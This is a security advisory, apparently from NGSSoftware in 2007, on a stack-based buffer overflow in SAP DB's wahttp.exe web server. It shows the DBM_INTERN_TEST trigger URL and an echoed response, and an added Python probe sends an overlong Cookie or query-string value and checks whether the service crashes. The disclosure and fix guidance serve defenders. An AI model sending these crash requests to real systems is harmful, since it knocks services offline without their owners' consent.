Critical Risk Vulnerability in SAP DB Web Server (Stack Overflow)

=======
Summary
=======
Name: SAP DB Web Server Stack Overflow
Release Date: 5 July 2007
Reference: NGS00486
Discovered by: Mark Litchfield <mark@ngssoftware.com>
Vendor: SAP
Vendor Reference: SECRES-291
Systems Affected: All Versions
Risk: Critical
Status: Fixed

========
TimeLine
========
Discovered: 3 January 2007
Reported: 11 January 2007
Released: 19 January 2007
Approved: 29 January 2007
Fixed: 27 March 2007
Published: 5 July 2007

===========
Description
===========
SAP DB is an open-source database server sponsored by SAP AG. It ships with a
set of web tools for administering database servers from a web browser. These
tools can either be integrated into a third-party web server such as IIS, or be
served by SAP DB's own web server, which by default listens on TCP port 9999.

When installed as its own web server, the process listening on TCP port 9999
is wahttp.exe.

=================
Technical Details
=================
http://target:9999/webdbm?Event=DBM_INTERN_TEST&Action=REFRESH

Looking at the 200 response we can determine what this request does: the page
echoes back the request's CGI variables and HTTP headers, including the Cookie
and query string, so it tells us exactly which input fields the server parses:


<body topmargin=0 leftmargin=0 marginwidth=0 marginheight=0
background=/WARoot/Images/tatami.gif>
<a href="javascript:parent.GotoWebDBMURL(this,
'Event=DBM_INTERN_TEST&amp;Action=REFRESH')">Test</a><table
style="font-family:courier new,monospace; font-size:8pt;" border=1
cellspacing=0 cellpadding=1>

<tr><td>sapdbwa_GetRequestURI&nbsp;</td><td>/webdbm&nbsp;</td></tr>
<tr><td>sapdbwa_GetIfModifiedSince&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>sapdbwa_GetQueryString&nbsp;</td><td>Event=DBM_INTERN_TEST&amp;Action=REFRESH&nbsp;</td></tr>
<tr><td>sapdbwa_GetPathInfo&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>sapdbwa_GetMethod&nbsp;</td><td>GET&nbsp;</td></tr>
<tr><td>sapdbwa_GetContentType&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>sapdbwa_GetContentLength&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>sapdbwa_GetPathTranslated&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>sapdbwa_GetServerName&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>AUTH_TYPE&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>CONTENT_LENGTH&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>CONTENT_TYPE&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>GATEWAY_INTERFACE&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_ACCEPT&nbsp;</td><td>/&nbsp;</td></tr>
<tr><td>PATH_INFO&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>QUERY_STRING&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>REMOTE_ADDR&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>REMOTE_HOST&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>REMOTE_USER&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>REQUEST_METHOD&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>SCRIPT_NAME&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>SERVER_NAME&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>SERVER_PORT&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>SERVER_PROTOCOL&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>SERVER_SOFTWARE&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_ACCEPT&nbsp;</td><td>/&nbsp;</td></tr>
<tr><td>HTTP_ACCEPT_CHARSET&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_ACCEPT_ENCODING&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_ACCEPT_LANGUAGE&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_ACCEPT_RANGES&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_AGE&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_ALLOW&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_AUTHORIZATION&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_CACHE_CONTROL&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_CONNECTION&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_CONTENT_ENCODING&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_CONTENT_LANGUAGE&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_CONTENT_LENGTH&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_CONTENT_LOCATION&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_CONTENT_MD5&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_CONTENT_RANGE&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_CONTENT_TYPE&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_DATE&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_ETAG&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_EXPECT&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_EXPIRES&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_FROM&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_HOST&nbsp;</td><td>localhost&nbsp;</td></tr>
<tr><td>HTTP_IF_MATCH&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_IF_MODIFIED_SINCE&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_IF_NONE_MATCH&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_IF_RANGE&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_IF_UNMODIFIED_SINCE&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_LAST_MODIFIED&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_LOCATION&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_MAX_FORWARDS&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_PRAGMA&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_PROXY_AUTHENTICATE&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_PROXY_AUTHORIZATION&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_RANGE&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_REFERER&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_RETRY_AFTER&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_SERVER&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_TE&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_TRAILER&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_TRANSFER_ENCODING&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_UPGRADE&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_USER_AGENT&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_VARY&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_VIA&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_WARNING&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_WWW_AUTHENTICATE&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>HTTP_COOKIE&nbsp;</td><td>SID=E63A7F73B20A5021442BAF3C8F70B97A&nbsp;</td></tr>
<tr><td>HTTP_SESSION_ID&nbsp;</td><td>NULL&nbsp;</td></tr>
<tr><td>Event&nbsp;</td><td>DBM_INTERN_TEST&nbsp;</td></tr>
<tr><td>Action&nbsp;</td><td>REFRESH&nbsp;</td></tr>
</table>
</body>


Repeating the request with a long value in the Cookie header (or adding a
Cookie header if the client did not send one) causes a stack-based buffer
overflow in wahttp.exe.

The same overflow can be triggered through numerous other fields.

Taking sapdbwa_GetQueryString as an example, it is enough to pass an
additional parameter by appending '&' followed by a long string to the query
string.
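The following probe is an added example and is not code from the NGS advisory or from SAP. It builds the DBM_INTERN_TEST request described above, parses the echoed name/value table out of a 200 response, and classifies what sending an overlong Cookie value (or an appended query-string parameter, the second variant described above) does to the service. The host name, the 4096-byte field length, the treatment of "no response at all" as the crash symptom, and the abbreviated SAMPLE_RESPONSE are assumptions or constructed data, not taken from the advisory.

```python
"""Probe for the wahttp.exe DBM_INTERN_TEST echo page described in the advisory.

Added example, not code from the NGS advisory or from SAP. Host names, ports,
field lengths and SAMPLE_RESPONSE are assumptions/constructed data.
"""
import html
import re
import socket
from typing import Dict, Optional

ECHO_PATH = "/webdbm?Event=DBM_INTERN_TEST&Action=REFRESH"


def build_request(host: str, cookie_value: Optional[str] = None,
                  extra_query: str = "") -> bytes:
    """Raw HTTP/1.0 GET for the echo page.

    cookie_value, if given, is sent as 'Cookie: SID=<value>' (the field the
    advisory overflows first). extra_query is appended verbatim to the query
    string, e.g. '&' + 'A' * 4096, for the sapdbwa_GetQueryString variant.
    """
    lines = [f"GET {ECHO_PATH}{extra_query} HTTP/1.0", f"Host: {host}"]
    if cookie_value is not None:
        lines.append(f"Cookie: SID={cookie_value}")
    lines += ["Connection: close", "", ""]      # blank line ends the headers
    return "\r\n".join(lines).encode("ascii")


# One echoed row looks like: <tr><td>NAME&nbsp;</td><td>VALUE&nbsp;</td></tr>
_ROW = re.compile(r"<tr><td>(.*?)&nbsp;</td><td>(.*?)&nbsp;</td></tr>", re.S)


def parse_echo_table(response: str) -> Dict[str, str]:
    """Map echoed variable names to values; 'NULL' is kept as the literal shown.

    The page lists HTTP_ACCEPT twice; the later row wins, which is harmless
    because both rows carry the same value.
    """
    return {html.unescape(k): html.unescape(v) for k, v in _ROW.findall(response)}


def send_probe(host: str, port: int, request: bytes,
               timeout: float = 5.0) -> Optional[bytes]:
    """Send one request; return the raw response, or None when the server
    resets, times out or closes without a byte (what a crashed process looks like)."""
    try:
        with socket.create_connection((host, port), timeout=timeout) as sock:
            sock.sendall(request)
            chunks = []
            while True:
                data = sock.recv(4096)
                if not data:
                    break
                chunks.append(data)
        return b"".join(chunks) or None
    except OSError:  # reset, refused, timeout, DNS failure
        return None


def classify(baseline: Optional[bytes], probe: Optional[bytes]) -> str:
    """Interpret a (short field, overlong field) response pair.

    'unreachable' : no usable echo page, so nothing can be concluded
    'crashed'     : echo page worked, then the server stopped answering
    'survived'    : overlong field echoed back; retry longer or treat as patched
    'inconclusive': server answered the probe, but not with the echo page
    """
    if baseline is None or b"DBM_INTERN_TEST" not in baseline:
        return "unreachable"
    if probe is None:
        return "crashed"
    if b"DBM_INTERN_TEST" in probe:
        return "survived"
    return "inconclusive"


def check_exposure(host: str, port: int = 9999, length: int = 4096) -> str:
    """Baseline request with a short SID, then the overlong-Cookie probe.

    This is a crash test and will take down a vulnerable wahttp.exe; only run
    it against systems you are authorised to disrupt.
    """
    baseline = send_probe(host, port, build_request(host, cookie_value="A" * 8))
    probe = send_probe(host, port, build_request(host, cookie_value="A" * length))
    return classify(baseline, probe)


# Constructed sample, abbreviated from the response shape shown in the advisory.
SAMPLE_RESPONSE = (
    "HTTP/1.0 200 OK\r\nContent-Type: text/html\r\n\r\n"
    "<body><table>"
    "<tr><td>sapdbwa_GetQueryString&nbsp;</td>"
    "<td>Event=DBM_INTERN_TEST&amp;Action=REFRESH&nbsp;</td></tr>"
    "<tr><td>HTTP_HOST&nbsp;</td><td>localhost&nbsp;</td></tr>"
    "<tr><td>HTTP_COOKIE&nbsp;</td><td>SID=E63A7F73B20A5021442BAF3C8F70B97A&nbsp;</td></tr>"
    "<tr><td>HTTP_ACCEPT&nbsp;</td><td>/&nbsp;</td></tr>"
    "<tr><td>Event&nbsp;</td><td>DBM_INTERN_TEST&nbsp;</td></tr>"
    "</table></body>"
)
```

Usage: `check_exposure("dbhost")` against a host you own; to exercise the query-string variant instead, send `build_request(host, extra_query="&" + "A" * 4096)` through `send_probe` and feed the result to `classify`. The baseline request matters: without it, a closed port or a missing web-tools install would be misread as a crash.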

===============
Fix Information
===============
Please ensure you are running the latest version; SAP tracks the fix under
vendor reference SECRES-291. Until the update is applied, the standalone web
server's port (9999 by default) should not be reachable from untrusted networks.

NGSSoftware Insight Security Research
http://www.ngssoftware.com/
http://www.databasesecurity.com/
http://www.nextgenss.com/
+44(0)208 401 0070
